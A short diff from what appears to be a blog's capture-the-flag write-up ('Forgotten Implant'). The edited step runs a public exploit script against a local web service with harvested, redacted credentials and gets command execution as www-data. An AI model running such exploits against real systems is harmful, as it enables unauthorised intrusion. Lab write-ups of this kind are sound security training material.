noncenz/noncenz.github.io/_posts/2023-08-01-Forgotten Implant .md

 └─$
 ```

-We upload the exploit file and run it with the credentials that we found in ada's python file earlier.
+Because this port isn't exposed externally, we'll have to either set up a reverse tunnel or attack locally on the box.
+For simplicity, we upload the exploit file and run it against localhost with the credentials that we found in ada's python file earlier.
 ```bash
 ada@forgottenimplant:~$ python3 ./50457.py 127.0.0.1 80 / app [redacted] id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)